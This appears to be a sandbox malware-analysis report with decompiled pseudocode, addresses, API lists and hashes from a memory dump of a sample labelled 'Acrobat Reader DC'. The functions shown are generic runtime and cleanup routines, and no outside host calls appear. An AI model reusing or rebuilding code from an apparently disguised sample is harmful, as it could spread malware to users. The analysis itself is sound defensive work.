							_t265 = 3;
							while(1) {
								_t226 = _v36;
								__eflags = _t216 -  *((intOrPtr*)(_t226 + 8));
								if(_t216 >=  *((intOrPtr*)(_t226 + 8))) {
									goto L25;
								}
								_t283 =  *((intOrPtr*)(_t274 + 4));
								_t204 =  *((intOrPtr*)(_t283 + _t265 * 4));
								__eflags =  *((short*)(_t204 + 8));
								if( *((short*)(_t204 + 8)) != 0) {
									L22:
									_t257 =  *((intOrPtr*)(_t283 + 4 + _t265 * 4));
									_t270 = _t265 + 1;
									__eflags =  *((short*)(_t257 + 8)) - 0x41;
									if( *((short*)(_t257 + 8)) == 0x41) {
										_t270 = _t270 + 2;
										__eflags = _t270;
									}
									E0040BA10(_t216, _t226, _t270,  &_v88,  *((intOrPtr*)( *((intOrPtr*)(_t226 + 4)) + _t216 * 4)));
									_t274 = _v16;
									_t209 = _v24 + 1;
									_v24 = _t209;
									__eflags = _t209 - _v20;
									if(_t209 < _v20) {
										_t216 = _t216 + 1;
										_t265 = _t270 + 1;
										__eflags = _t265;
										continue;
									}
									goto L25;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *_t204 - 0x1e;
									if( *_t204 != 0x1e) {
										break;
									}
									_t204 =  *((intOrPtr*)(_t283 + 4 + _t265 * 4));
									_t265 = _t265 + 1;
									__eflags =  *((short*)(_t204 + 8));
									if( *((short*)(_t204 + 8)) == 0) {
										continue;
									}
									goto L22;
								}
								E0045E737(_t287, _a4, 0x91, 0xffffffff);
								goto L30;
							}
							goto L25;
						}
						_t258 =  *0x4a7f0c; // 0x0
						E0046FE32(((_t258 & 0x0000003f) << 4) + 0x4a9138);
						 *0x4a7f0c =  *0x4a7f0c + 1;
						__eflags =  *0x4a7f0c;
						goto L12;
					}
					_t262 = 2;
					while(1) {
						__eflags = _t262;
						if(_t262 == 0) {
							break;
						}
						InterlockedDecrement(0x4a7f04);
						Sleep(0xa);
						InterlockedIncrement(0x4a7f04);
						_t133 =  *0x4a7f04; // 0x0
						_t262 = _t262 - 1;
						__eflags = _t133 - 1;
						if(_t133 != 1) {
							continue;
						}
						goto L8;
					}
					__eflags = _t133 - 1;
					if(_t133 == 1) {
						goto L8;
					}
					goto L12;
				}
				L1:
				return 0;
			}

























































                                  0x004091b0
                                  0x004091b0
                                  0x004091c0
                                  0x0042c5fe
                                  0x0042c601
                                  0x0042c608
                                  0x00000000
                                  0x00000000
                                  0x0042c60e
                                  0x0042c611
                                  0x0042c618
                                  0x0042c61f
                                  0x0042c626
                                  0x0042c62d
                                  0x0042c634
                                  0x0042c63b
                                  0x0042c642
                                  0x0042c649
                                  0x0042c659
                                  0x0042c65b
                                  0x0042c660
                                  0x0042c663
                                  0x0042c697
                                  0x0042c697
                                  0x0042c69c
                                  0x0042c6a2
                                  0x0042c737
                                  0x0042c73c
                                  0x0042c745
                                  0x0042c74d
                                  0x0042c755
                                  0x00000000
                                  0x0042c755
                                  0x0042c6ae
                                  0x0042c6ae
                                  0x0042c6b5
                                  0x0042c6ba
                                  0x0042c6bc
                                  0x00000000
                                  0x00000000
                                  0x0042c6be
                                  0x0042c6c7
                                  0x0042c6ca
                                  0x0042c6cf
                                  0x0042c6db
                                  0x0042c6e0
                                  0x0042c6e5
                                  0x0042c6f1
                                  0x0042c6f6
                                  0x0042c715
                                  0x0042c717
                                  0x0042c76a
                                  0x0042c776
                                  0x0042c779
                                  0x0042c791
                                  0x0042c796
                                  0x0042c798
                                  0x0042c7a0
                                  0x0042c7a5
                                  0x0042c7a9
                                  0x0042c7ab
                                  0x0042c7ae
                                  0x0042c812
                                  0x0042c812
                                  0x0042c81e
                                  0x0042c825
                                  0x0042c82a
                                  0x0042c82f
                                  0x0042c83a
                                  0x0042c844
                                  0x0042c849
                                  0x0042c84c
                                  0x0042c9ec
                                  0x0042c9ef
                                  0x0042c9f9
                                  0x0042ca03
                                  0x0042ca08
                                  0x0042ca10
                                  0x0042ca22
                                  0x0042ca29
                                  0x0042ca2e
                                  0x0042ca35
                                  0x0042c87a
                                  0x0042c87a
                                  0x0042c881
                                  0x0042c884
                                  0x0042c88c
                                  0x0042c894
                                  0x00000000
                                  0x0042c899
                                  0x0042ca3f
                                  0x0042ca44
                                  0x0042ca46
                                  0x00000000
                                  0x00000000
                                  0x0042ca4c
                                  0x0042ca51
                                  0x0042ca53
                                  0x00000000
                                  0x00000000
                                  0x0042c876
                                  0x00000000
                                  0x0042c876
                                  0x0042c855
                                  0x0042c855
                                  0x0042c858
                                  0x0042c85f
                                  0x0042c8a7
                                  0x0042c8a7
                                  0x0042c8aa
                                  0x0042c8ad
                                  0x00000000
                                  0x00000000
                                  0x0042c8b5
                                  0x0042c8b8
                                  0x0042c8bc
                                  0x0042c8bf
                                  0x0042c8c6
                                  0x0042c8cd
                                  0x0042c8d4
                                  0x0042c8db
                                  0x0042c8e2
                                  0x0042c8e7
                                  0x0042c8eb
                                  0x0042c94c
                                  0x0042c951
                                  0x0042c958
                                  0x0042c95f
                                  0x0042c971
                                  0x0042c974
                                  0x0042c97d
                                  0x0042c985
                                  0x0042c9a5
                                  0x0042c9a8
                                  0x0042c9ab
                                  0x0042c9af
                                  0x0042c9b4
                                  0x0042c9d8
                                  0x0042c9dd
                                  0x0042c9dd
                                  0x0042c9e0
                                  0x0042c9e1
                                  0x0042c9e3
                                  0x0042c9e6
                                  0x0042c8a0
                                  0x0042c8a0
                                  0x0042c8a0
                                  0x0042c8a4
                                  0x00000000
                                  0x0042c8a4
                                  0x00000000
                                  0x0042c9e6
                                  0x0042c9b6
                                  0x0042c9ba
                                  0x0042c9be
                                  0x0042c9c2
                                  0x0042c9d1
                                  0x0042c9d1
                                  0x00000000
                                  0x0042c9d1
                                  0x0042c9c4
                                  0x0042c9c8
                                  0x00000000
                                  0x00000000
                                  0x0042c9ca
                                  0x00000000
                                  0x0042c9ca
                                  0x0042c8ed
                                  0x0042c8f1
                                  0x0042c8f5
                                  0x0042c8f9
                                  0x0042c901
                                  0x0042c904
                                  0x0042c90f
                                  0x0042c912
                                  0x0042c915
                                  0x0042c922
                                  0x0042c92c
                                  0x0042c93f
                                  0x0042c944
                                  0x00000000
                                  0x0042c944
                                  0x0042c8fb
                                  0x0042c8ff
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c98c
                                  0x0042c995
                                  0x0042c99e
                                  0x0042c9a0
                                  0x00000000
                                  0x0042c9a0
                                  0x0042c8a7
                                  0x0042c7b0
                                  0x0042c7b5
                                  0x0042c7bb
                                  0x0042c7bb
                                  0x0042c7be
                                  0x0042c7c1
                                  0x00000000
                                  0x00000000
                                  0x0042c7c3
                                  0x0042c7c6
                                  0x0042c7c9
                                  0x0042c7ce
                                  0x0042c7e5
                                  0x0042c7e5
                                  0x0042c7e9
                                  0x0042c7ea
                                  0x0042c7ef
                                  0x0042c7f1
                                  0x0042c7f1
                                  0x0042c7f1
                                  0x0042c7fe
                                  0x0042c806
                                  0x0042c809
                                  0x0042c80a
                                  0x0042c80d
                                  0x0042c810
                                  0x0042c7b9
                                  0x0042c7ba
                                  0x0042c7ba
                                  0x00000000
                                  0x0042c7ba
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c7d0
                                  0x0042c7d0
                                  0x0042c7d0
                                  0x0042c7d3
                                  0x00000000
                                  0x00000000
                                  0x0042c7d9
                                  0x0042c7dd
                                  0x0042c7de
                                  0x0042c7e3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c7e3
                                  0x0042c86f
                                  0x00000000
                                  0x0042c86f
                                  0x00000000
                                  0x0042c7bb
                                  0x0042c719
                                  0x0042c72c
                                  0x0042c731
                                  0x0042c731
                                  0x00000000
                                  0x0042c731
                                  0x0042c665
                                  0x0042c66a
                                  0x0042c66a
                                  0x0042c66c
                                  0x00000000
                                  0x00000000
                                  0x0042c677
                                  0x0042c67f
                                  0x0042c68a
                                  0x0042c68c
                                  0x0042c691
                                  0x0042c692
                                  0x0042c695
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c695
                                  0x0042c75f
                                  0x0042c762
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c768
                                  0x004091c6
                                  0x00000000

                                  APIs
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                  • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                  • String ID: @COM_EVENTOBJ
                                  • API String ID: 327565842-2228938565
                                  • Opcode ID: 70307c3fe60be0ab36e309062113007dfb865a7b1b1bb36a34d2cd10d052add5
                                  • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                  • Opcode Fuzzy Hash: 70307c3fe60be0ab36e309062113007dfb865a7b1b1bb36a34d2cd10d052add5
                                  • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0046C84C Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 308COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 21%
                                  			E0046C84C(intOrPtr _a4, void* _a8, char _a12, intOrPtr _a16) {
				char* _v8;
				char* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				char _v52;
				char _v68;
				void* _v76;
				char _v84;
				intOrPtr* _v92;
				char _v100;
				char _v132;
				void* __edi;
				void* __esi;
				short* _t76;
				intOrPtr _t89;
				intOrPtr* _t92;
				char _t95;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr _t104;
				intOrPtr* _t106;
				intOrPtr* _t155;
				intOrPtr* _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t159;
				intOrPtr* _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;

				_t162 = _a12;
				_t155 = _a8;
				_a8 = 0;
				_v8 = L"_NewEnum";
				_v12 = L"get__NewEnum";
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0x20404;
				_v32 = 0;
				_v28 = 0xc0;
				_v24 = 0x46000000;
				E00412F40( &_v132, 0, 0x20);
				if(_t155 == 0 || _a16 == 0 || _t162 == 0) {
					L34:
					_push(1);
					_push(L"Null Object assignment in FOR..IN loop");
					goto L35;
				} else {
					if(E00432416(_t162) != 0) {
						L21:
						_t76 =  *_t162;
						__eflags = _t76;
						if(_t76 != 0) {
							__eflags =  *_t76 - 0xd;
							if( *_t76 == 0xd) {
								_t156 =  *((intOrPtr*)(_t76 + 8));
								__imp__#8( &_v68);
								__imp__#9( &_v68);
								_t157 =  *((intOrPtr*)( *((intOrPtr*)( *_t156 + 0xc))))(_t156, 1,  &_v68,  &_a8);
								__eflags = _t157;
								if(_t157 >= 0) {
									L29:
									__eflags = _a8;
									if(_a8 == 0) {
										L32:
										_v68 = 1;
										E00408F40(_t157, _t162);
										 *((intOrPtr*)(_t162 + 8)) = 1;
										 *_t162 = 0;
										_push( &_v68);
									} else {
										__eflags = _t157 - 1;
										if(_t157 == 1) {
											goto L32;
										} else {
											_push( &_v68);
										}
									}
									E00468070(_a16);
									__imp__#9( &_v68);
									__eflags = 0;
									return 0;
								} else {
									__eflags = _t157 - 1;
									if(_t157 == 1) {
										goto L29;
									} else {
										E00408F40(_t157, _t162);
										 *((intOrPtr*)(_t162 + 8)) = 1;
										 *_t162 = 0;
										return E00451B42(_a4, _t157, 0, 0, 1);
									}
								}
							} else {
								_push(1);
								_push(L"Incorrect Object type in FOR..IN loop");
								L35:
								_push(0);
								_push(1);
								_push(_a4);
								return E00451B42();
							}
						} else {
							return E00451B42(_a4, 1, 0, L"Null Object assignment in FOR..IN loop", 1);
						}
					} else {
						_t89 =  *_t155;
						if(_t89 == 0 ||  *((intOrPtr*)(_t155 + 8)) != 8) {
							return E00451B42(_a4, 2, 0, L"Null Object assignment in FOR..IN loop", 1);
						} else {
							_t158 =  *((intOrPtr*)(_t89 + 8));
							if(_t158 != 0) {
								_t92 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x14))))(_t158, 0x482a18,  &_v8, 1, 0x400,  &_a12);
								__eflags = _t92;
								if(_t92 < 0) {
									L10:
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x14))))(_t158, 0x482a18,  &_v12, 1, 0x400,  &_a12);
									if(__eflags < 0) {
										L12:
										_a12 = 0xfffffffc;
									} else {
										__eflags = _a12 - 0xffffffff;
										if(__eflags == 0) {
											goto L12;
										}
									}
								} else {
									__eflags = _a12 - 0xffffffff;
									if(__eflags == 0) {
										goto L10;
									}
								}
								_t95 = E00410E53(_t158, _t162, __eflags);
								_v16 = _t95;
								_v52 = _t95;
								_v44 = 0;
								__imp__#8( &_v100, 0x10);
								_t100 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x18))))(_t158, _a12, 0x482a18, 0x800, 3,  &_v52,  &_v100,  &_v132,  &_v20);
								_push(_v16);
								_t159 = _t100;
								E0041351D();
								__eflags = _t159;
								if(_t159 >= 0) {
									_t102 = _v92;
									__eflags = _t102;
									if(_t102 == 0) {
										goto L34;
									} else {
										_v84 = 0xd;
										_t160 = _t102;
										_t104 =  *((intOrPtr*)( *((intOrPtr*)( *_t102))))(_t102,  &_v36,  &_v76);
										_v16 = _t104;
										 *((intOrPtr*)( *((intOrPtr*)( *_t160 + 8))))(_t160);
										_t106 = _v76;
										_t161 = _t106;
										__eflags = _t106;
										if(_t106 != 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x14))))(_t106);
											E00468070(_t162,  &_v84);
											 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 8))))(_t161);
											goto L21;
										} else {
											return E00451B42(_a4, _v16, 0, 0, 1);
										}
									}
								} else {
									_push(1);
									_push(0);
									__eflags = _t159 - 0x80020009;
									if(_t159 != 0x80020009) {
										_push(0);
										_push(_t159);
										_push(_a4);
										return E00451B42();
									} else {
										_push( &_v132);
										_push(_t159);
										_push(_a4);
										return E00451B42();
									}
								}
							} else {
								return E00451B42(_a4, 2, 0, L"Null Object assignment in FOR..IN loop", 1);
							}
						}
					}
				}
			}







































                                  0x0046c857
                                  0x0046c85b
                                  0x0046c869
                                  0x0046c86c
                                  0x0046c873
                                  0x0046c87a
                                  0x0046c87d
                                  0x0046c880
                                  0x0046c883
                                  0x0046c886
                                  0x0046c88d
                                  0x0046c890
                                  0x0046c897
                                  0x0046c89e
                                  0x0046c8a8
                                  0x0046cb43
                                  0x0046cb43
                                  0x0046cb45
                                  0x00000000
                                  0x0046c8bf
                                  0x0046c8c7
                                  0x0046ca52
                                  0x0046ca52
                                  0x0046ca54
                                  0x0046ca56
                                  0x0046ca90
                                  0x0046ca94
                                  0x0046caa2
                                  0x0046caa9
                                  0x0046cab3
                                  0x0046cacb
                                  0x0046cacd
                                  0x0046cacf
                                  0x0046cafb
                                  0x0046cafb
                                  0x0046cafe
                                  0x0046cb0b
                                  0x0046cb10
                                  0x0046cb14
                                  0x0046cb1c
                                  0x0046cb23
                                  0x0046cb25
                                  0x0046cb00
                                  0x0046cb00
                                  0x0046cb03
                                  0x00000000
                                  0x0046cb05
                                  0x0046cb08
                                  0x0046cb08
                                  0x0046cb03
                                  0x0046cb29
                                  0x0046cb32
                                  0x0046cb38
                                  0x0046cb40
                                  0x0046cad1
                                  0x0046cad1
                                  0x0046cad4
                                  0x00000000
                                  0x0046cad6
                                  0x0046cad6
                                  0x0046cae4
                                  0x0046caeb
                                  0x0046caf8
                                  0x0046caf8
                                  0x0046cad4
                                  0x0046ca96
                                  0x0046ca96
                                  0x0046ca98
                                  0x0046cb4a
                                  0x0046cb4d
                                  0x0046cb4e
                                  0x0046cb50
                                  0x0046cb5c
                                  0x0046cb5c
                                  0x0046ca58
                                  0x0046ca71
                                  0x0046ca71
                                  0x0046c8cd
                                  0x0046c8cd
                                  0x0046c8d1
                                  0x0046ca8d
                                  0x0046c8e1
                                  0x0046c8e1
                                  0x0046c8e6
                                  0x0046c91e
                                  0x0046c920
                                  0x0046c922
                                  0x0046c92a
                                  0x0046c946
                                  0x0046c948
                                  0x0046c950
                                  0x0046c950
                                  0x0046c94a
                                  0x0046c94a
                                  0x0046c94e
                                  0x00000000
                                  0x00000000
                                  0x0046c94e
                                  0x0046c924
                                  0x0046c924
                                  0x0046c928
                                  0x00000000
                                  0x00000000
                                  0x0046c928
                                  0x0046c959
                                  0x0046c95e
                                  0x0046c961
                                  0x0046c96b
                                  0x0046c96e
                                  0x0046c99a
                                  0x0046c99f
                                  0x0046c9a0
                                  0x0046c9a2
                                  0x0046c9aa
                                  0x0046c9ac
                                  0x0046c9e4
                                  0x0046c9e7
                                  0x0046c9e9
                                  0x00000000
                                  0x0046c9ef
                                  0x0046c9f4
                                  0x0046ca02
                                  0x0046ca07
                                  0x0046ca0f
                                  0x0046ca12
                                  0x0046ca14
                                  0x0046ca17
                                  0x0046ca19
                                  0x0046ca1b
                                  0x0046ca3d
                                  0x0046ca45
                                  0x0046ca50
                                  0x00000000
                                  0x0046ca1d
                                  0x0046ca34
                                  0x0046ca34
                                  0x0046ca1b
                                  0x0046c9ae
                                  0x0046c9ae
                                  0x0046c9b0
                                  0x0046c9b1
                                  0x0046c9b7
                                  0x0046c9d3
                                  0x0046c9d4
                                  0x0046c9d5
                                  0x0046c9e1
                                  0x0046c9b9
                                  0x0046c9bf
                                  0x0046c9c0
                                  0x0046c9c1
                                  0x0046c9cd
                                  0x0046c9cd
                                  0x0046c9b7
                                  0x0046c8e8
                                  0x0046c901
                                  0x0046c901
                                  0x0046c8e6
                                  0x0046c8d1
                                  0x0046c8c7

                                  APIs
                                  • _memset.LIBCMT ref: 0046C89E
                                  • VariantInit.OLEAUT32(?), ref: 0046C96E
                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorInitLast_memset
                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                  • API String ID: 530611519-625585964
                                  • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                  • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E00401CB0(intOrPtr __ecx) {
				intOrPtr _v8;
				long _v12;
				long* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t97;
				struct HWND__* _t100;
				int** _t103;
				intOrPtr* _t104;
				struct HINSTANCE__** _t105;
				intOrPtr* _t106;
				void* _t119;
				void* _t124;
				void* _t126;
				void* _t129;
				void* _t131;
				intOrPtr* _t159;
				signed int _t173;
				long* _t174;
				intOrPtr _t203;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				long* _t210;
				intOrPtr* _t212;
				intOrPtr* _t217;
				intOrPtr* _t219;
				intOrPtr* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr _t225;
				void* _t226;

				_t205 = __ecx;
				_t97 = __ecx - 0x49c;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx - 0x49c)) + 4)) + __ecx - 0x49c)) = "bZB";
				_v12 = _t97;
				 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 4)) + __ecx - 0x4a0)) =  *((intOrPtr*)( *_t97 + 4)) - 0x49c;
				_t100 =  *(__ecx - 0x3b4);
				_v8 = __ecx;
				if(_t100 != 0) {
					DestroyWindow(_t100);
				}
				mciSendStringW(L"close all", 0, 0, 0);
				if( *((intOrPtr*)(_t205 - 0x2ec)) > 0) {
					_t207 = 0;
					do {
						_t103 =  *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4);
						if( *_t103 != 0) {
							UnregisterHotKey( *0x497518,  *( *_t103));
							_t171 =  *( *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4));
							if( *( *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4)) != 0) {
								E00442B97(_t171);
							}
						}
						_t207 = _t207 + 1;
					} while (_t207 <  *((intOrPtr*)(_t205 - 0x2ec)));
					goto L2;
				} else {
					L2:
					if( *((intOrPtr*)(_t205 - 0x31c)) > 0) {
						_t173 = 0;
						do {
							_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x320)) + _t173 * 4));
							if( *_t104 != 0) {
								_t159 =  *_t104;
								if( *_t159 != 0) {
									FindClose( *(_t159 + 8));
									_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x320)) + _t173 * 4)))) + 0xc)));
									E004111DC();
									_t226 = _t226 + 4;
								} else {
									_t225 =  *((intOrPtr*)(_t159 + 4));
									E0040DA20(_t225);
									 *((intOrPtr*)(_t225 + 0x2c)) = 0;
									 *((intOrPtr*)(_t225 + 0x30)) = 0;
								}
								_t203 =  *((intOrPtr*)(_t205 - 0x320));
								_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t203 + _t173 * 4))));
								_push( *((intOrPtr*)( *((intOrPtr*)(_t203 + _t173 * 4)))));
								E004111DC();
								_t226 = _t226 + 4;
							}
							_t173 = _t173 + 1;
						} while (_t173 <  *((intOrPtr*)(_t205 - 0x31c)));
					}
					if( *((intOrPtr*)(_t205 - 0x30c)) > 0) {
						_t208 = 0;
						do {
							_t105 =  *( *((intOrPtr*)(_t205 - 0x310)) + _t208 * 4);
							if( *_t105 != 0) {
								FreeLibrary( *_t105);
							}
							_t208 = _t208 + 1;
						} while (_t208 <  *((intOrPtr*)(_t205 - 0x30c)));
					}
					if( *((intOrPtr*)(_t205 - 0x2fc)) > 0) {
						_t209 = 0;
						do {
							_t183 =  *((intOrPtr*)(_t205 - 0x300));
							_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4));
							if( *_t106 != 0) {
								VirtualFree( *( *_t106 + 0x10), 0, 0x8000);
								_t183 =  *((intOrPtr*)(_t205 - 0x300));
								_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4))));
								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4)))) != 0) {
									E0044AFD1(_t155);
								}
							}
							_t209 = _t209 + 1;
						} while (_t209 <  *((intOrPtr*)(_t205 - 0x2fc)));
					}
					_t210 = _t205 - 0x2e4;
					_v16 = _t210;
					E00408F40(_t205, _t210);
					_t210[2] = 1;
					 *_t210 = 0;
					_t174 = _t205 - 0x14;
					E00408F40(_t205, _t174);
					_t212 = _v12;
					_t174[2] = 1;
					 *_t174 = 0;
					_t111 =  *((intOrPtr*)( *_t212 + 4)) + _t205;
					if( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 4)) + _t205 - 0x498)) == 0) {
						L8:
						E0040E750(_t183, _t205, _t212);
						_t113 =  *((intOrPtr*)(_t205 - 0x28));
						if( *((intOrPtr*)(_t205 - 0x28)) != 0) {
							E004326ED(_t113);
						}
						E00408F40(_t205, _t174);
						E004109A0(_t205 - 0x34);
						E004109C0(_t205 - 0x44);
						E00402250(_t205 - 0x64);
						_t119 = E00401400(_t205 - 0x1a0);
						_t217 = _t205 - 0x1bc;
						 *_t217 = 0x48ab10;
						E004109E0(_t119, _t217);
						_push( *((intOrPtr*)(_t217 + 4)));
						E004111DC();
						E004012F0(_t205 - 0x2c4, _t205);
						E00402250(_t205 - 0x2d4);
						_t124 = E00408F40(_t205, _v16);
						_t219 = _t205 - 0x2f4;
						 *_t219 = 0x48ab10;
						E004109E0(_t124, _t219);
						_push( *((intOrPtr*)(_t219 + 4)));
						_t126 = E004111DC();
						_t220 = _t205 - 0x304;
						 *_t220 = 0x48ab10;
						E004109E0(_t126, _t220);
						_push( *((intOrPtr*)(_t220 + 4)));
						_t129 = E004111DC();
						_t221 = _t205 - 0x314;
						 *_t221 = 0x48ab10;
						E004109E0(_t129, _t221);
						_push( *((intOrPtr*)(_t221 + 4)));
						_t131 = E004111DC();
						_t222 = _t205 - 0x324;
						 *_t222 = 0x48ab10;
						E004109E0(_t131, _t222);
						_push( *((intOrPtr*)(_t222 + 4)));
						E004111DC();
						E00410AA0(_t205 - 0x330);
						E00410A70(_t205 - 0x340, _t205 - 0x2c4);
						E00402250(_t205 - 0x350);
						E00410A40(_t205 - 0x368);
						E004109C0(_t205 - 0x374);
						E004109C0(_t205 - 0x380);
						E00402250(_t205 - 0x3c4);
						E00402250(_t205 - 0x3d4);
						E00402250(_t205 - 0x3e4);
						return E0040DDD0(_t205 - 0x414);
					} else {
						_v12 = 0;
						do {
							E0040D410( &_v12, _t111 - 0x49c);
							E0040DA90(_t174, _t111 - 0x49c,  *((intOrPtr*)( *_t212 + 4)) + _t205 - 0x498);
							_t183 =  *_t212;
							_t111 = _v8 +  *((intOrPtr*)( *_t212 + 4));
							_t205 = _v8;
						} while ( *((intOrPtr*)(_v8 +  *((intOrPtr*)( *_t212 + 4)) - 0x498)) != 0);
						goto L8;
					}
				}
			}





































                                  0x00401cb9
                                  0x00401cc4
                                  0x00401cca
                                  0x00401cd5
                                  0x00401ce3
                                  0x00401cea
                                  0x00401cf0
                                  0x00401cf5
                                  0x00426f50
                                  0x00426f50
                                  0x00401d06
                                  0x00401d13
                                  0x00426f5b
                                  0x00426f5d
                                  0x00426f63
                                  0x00426f69
                                  0x00426f77
                                  0x00426f86
                                  0x00426f8a
                                  0x00426f8d
                                  0x00426f8d
                                  0x00426f8a
                                  0x00426f92
                                  0x00426f93
                                  0x00000000
                                  0x00401d19
                                  0x00401d19
                                  0x00401d20
                                  0x00426fa0
                                  0x00426fa2
                                  0x00426fa8
                                  0x00426fae
                                  0x00426fb0
                                  0x00426fb5
                                  0x00426fcd
                                  0x00426fe1
                                  0x00426fe2
                                  0x00426fe7
                                  0x00426fb7
                                  0x00426fb7
                                  0x00426fba
                                  0x00426fc1
                                  0x00426fc4
                                  0x00426fc4
                                  0x00426fea
                                  0x00426ff3
                                  0x00426ff5
                                  0x00426ff6
                                  0x00426ffb
                                  0x00426ffb
                                  0x00426ffe
                                  0x00426fff
                                  0x00427007
                                  0x00401d2d
                                  0x0042700c
                                  0x0042700e
                                  0x00427014
                                  0x0042701a
                                  0x0042701f
                                  0x0042701f
                                  0x00427025
                                  0x00427026
